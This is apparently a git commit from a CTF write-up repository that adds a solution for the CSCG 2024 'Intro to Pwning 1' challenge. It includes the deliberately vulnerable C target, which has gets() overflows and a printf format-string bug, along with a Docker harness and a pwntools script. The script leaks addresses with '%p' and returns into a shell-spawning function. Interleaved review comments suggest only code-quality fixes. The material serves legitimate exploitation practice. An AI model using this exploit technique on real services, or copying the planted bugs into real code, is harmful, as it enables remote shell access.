cscg24-pwn

CSCG 2024 Challenge 'Intro to Pwning 1'
git clone https://git.sinitax.com/sinitax/cscg24-pwn

commit 88f4ea4c85a4224515ba1146b8058bce9e2a1994
Author: Louis Burda <quent.burda@gmail.com>
Date:   Sat, 30 Mar 2024 15:50:18 +0100

Add solution

Diffstat:
Achall/intro-pwn-1.zip | 0
Asolve/Dockerfile | 7+++++++
Asolve/flag | 1+
Asolve/pwn1 | 0
Asolve/pwn1.c | 70++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asolve/solve.py | 41+++++++++++++++++++++++++++++++++++++++++
Asolve/ynetd | 0
7 files changed, 119 insertions(+), 0 deletions(-)

diff --git a/chall/intro-pwn-1.zip b/chall/intro-pwn-1.zip
Binary files differ.
diff --git a/solve/Dockerfile b/solve/Dockerfile
@@ -0,0 +1,7 @@
+# docker build -t pwn1 . && docker run -p 1024:1024 --rm -it pwn1
+
+FROM ubuntu:22.04
+COPY pwn1 flag ynetd .
+
+EXPOSE 1024
+CMD ./ynetd ./pwn1
diff --git a/solve/flag b/solve/flag
@@ -0,0 +1 @@
+CSCG{NOW_PRACTICE_EVEN_MORE}
diff --git a/solve/pwn1 b/solve/pwn1
Binary files differ.
diff --git a/solve/pwn1.c b/solve/pwn1.c
@@ -0,0 +1,70 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+
+// pwn1: gcc pwn1.c -o pwn1
+
+// --------------------------------------------------- SETUP
+
+void ignore_me_init_buffering() {
+ setvbuf(stdout, NULL, _IONBF, 0);
+ setvbuf(stdin, NULL, _IONBF, 0);
+ setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void kill_on_timeout(int sig) {
+ if (sig == SIGALRM) {
+ printf("[!] Anti DoS Signal. Patch me out for testing.");
+ _exit(0);
+ }
+}
+
+void ignore_me_init_signal() {
+ signal(SIGALRM, kill_on_timeout);
+ alarm(60);
+}
+
+// --------------------------------------------------- MENU
+
+void WINgardium_leviosa() {
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Slytherin.. │\n");
+ printf("└───────────────────────┘\n");
+ system("/bin/sh");
+}
+
+void welcome() {
+ char read_buf[0xff];
+ printf("Enter your witch name:\n");
+ gets(read_buf);
+ printf("┌───────────────────────┐\n");
+ printf("│ You are a Hufflepuff! │\n");
+ printf("└───────────────────────┘\n");
+ printf(read_buf);
+}
+
+void AAAAAAAA() {
+ char read_buf[0xff];
+
+ printf(" enter your magic spell:\n");
+ gets(read_buf);
+ if(strcmp(read_buf, "Expelliarmus") == 0) {
+ printf("~ Protego!\n");
+ } else {
+ printf("-10 Points for Hufflepuff!\n");
+ _exit(0);
+ }
+}
+// --------------------------------------------------- MAIN
+
+void main(int argc, char* argv[]) {
+ ignore_me_init_buffering();
+ ignore_me_init_signal();
+
+ welcome();
+ AAAAAAAA();
+}
+ 
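Review bot: `CMD ./ynetd ./pwn1` is the shell form, so the container's PID 1 is `/bin/sh -c` rather than ynetd and a `docker stop` signal reaches the wrapper shell instead of the service; the exec form `CMD ["./ynetd", "./pwn1"]` avoids that. There is also no `USER` directive, so pwn1 — and the `/bin/sh` it can spawn — runs as root inside the container; for a throwaway local harness that is tolerable, but `RUN useradd -m ctf` followed by `USER ctf` (placed after the `COPY`, with matching file ownership) keeps the test environment closer to a hardened deployment. The header comment already documents the build/run invocation, which is good; it could additionally say that `flag` here is a dummy value for local testing only.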
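Review bot: The only build note is `// pwn1: gcc pwn1.c -o pwn1`, which records neither the compiler version nor the mitigation flags, yet the offsets hard-coded in solve.py are valid only for one exact binary; a reader who rebuilds from this file will most likely get a different layout and a silently broken solver. Extend the comment to something like `// pwn1: gcc pwn1.c -o pwn1  (toolchain: <compiler+version>, flags: <as shipped by the challenge>; offsets in solve.py assume this exact build)` with the placeholders filled in. It would also help to state at the top that the file is a reproduction of the challenge target and that `gets()`, `printf(read_buf)` and `void main` are kept on purpose, e.g. `// Challenge target reproduced as shipped; gets()/printf(fmt) are the intended bugs - do not "fix" or reformat, any change may shift the offsets solve.py depends on.`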
diff --git a/solve/solve.py b/solve/solve.py
@@ -0,0 +1,41 @@
+from pwn import *
+import os
+
+if args.debug:
+ p = process("ncat localhost 1024".split())
+else:
+ if len(sys.argv) < 2:
+ print("USAGE: exploit.py <ID>")
+ sys.exit(1)
+ p = process("ncat --ssl {}-1024-intro-pwn-1.challenge.cscg.live 1337"
+ .format(sys.argv[1]).split())
+
+p.recvuntil(b"Enter your witch name:")
+
+p.sendline(b"%p " * 50)
+
+leaked = p.recvuntil(b"enter your magic spell:")
+leak_vals = leaked.decode().split(" ")
+
+for i,v in enumerate(leak_vals):
+ print(i, "->", v)
+
+base = int(leak_vals[41], 16) - 2537
+win = base + 0x9ec
+extra_ret = base + 0x0b2d
+
+print("RERET:", hex(extra_ret))
+print("WIN:", hex(win))
+
+# Why do we need to realign the stack with another return?
+
+# The `movaps xmmword ptr` instruction requires the stack pointer to be
+# 16 byte aligned. Because of this we need to return twice, such that
+# the stack pointer moves down another 8 bytes.
+
+p.send("Expelliarmus\x00" + "A" * 251)
+p.send(p64(extra_ret))
+p.send(p64(win))
+p.send("\n")
+
+p.interactive()
diff --git a/solve/ynetd b/solve/ynetd
Binary files differ.
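Review bot: The constants `41`, `2537`, `0x9ec` and `0x0b2d` in the `base`/`win`/`extra_ret` lines are unexplained magic numbers that tie the script to one exact build of pwn1, and nothing in the file says which symbol or leaked slot each one corresponds to; a one-line comment per constant (e.g. `# 2537: distance from the value leaked at index 41 down to base - recompute after any rebuild`, with the exact meaning confirmed by whoever derived it) would make the script maintainable. `os` is imported but never used, while `sys` is used without an explicit import and only resolves through `from pwn import *`; `import sys` should replace `import os`. The usage line prints `exploit.py` although the file is `solve.py`, and `p.send("Expelliarmus\x00" + "A" * 251)` mixes `str` payloads with the `bytes` used everywhere else, which is worth normalizing to `b"..."` for consistency.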